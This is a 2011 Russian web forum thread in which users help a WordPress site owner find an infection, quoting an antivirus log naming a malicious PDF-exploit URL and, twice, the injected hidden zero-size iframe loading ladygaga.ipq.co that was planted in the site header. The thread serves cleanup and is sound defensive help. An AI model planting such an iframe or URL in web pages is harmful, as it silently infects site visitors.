Перейти к содержимому


Партнерская программа Kredov

С сайта поперли вирусы

#21 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0
0

Отправлено 09 Февраль 2011 - 13:14

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.
  • 0

#22 softgaz

softgaz
    Topic Starter
  • Пользователь
  • 14 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 13:25

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Естественно, это понятно: реальные скрипты

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Отправил - заранее огромнейшее спасибо!!!
  • 0

#23 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 15:53

softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ.
Ничего подозрительного не нашел.

На данный момент у меня антивирус не ругается на Ваш сайт.
У Вас есть сейчас сообщения о вирусе, блокировка сайта?
  • 0

#24 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:01

softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе.
Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его.
Либо произвели еще какие-либо действия.

Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. ;)
  • 0

#25 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:04

есть вирус ;) ты хостеру писал?
  • 0

#26 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:09

есть вирус ;) ты хостеру писал?



Да, действительно, сейчас повторно зашел и началось
  • 0

#27 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:15

Вот собственно лог журнала:

09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.
  • 0

#28 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:24

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?
  • 0

#29 Kismedia

Kismedia
  • Пользователь
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 23:13

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!
  • 0

#30 softgaz

softgaz
    Topic Starter
  • Пользователь
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 07:52

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!



Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru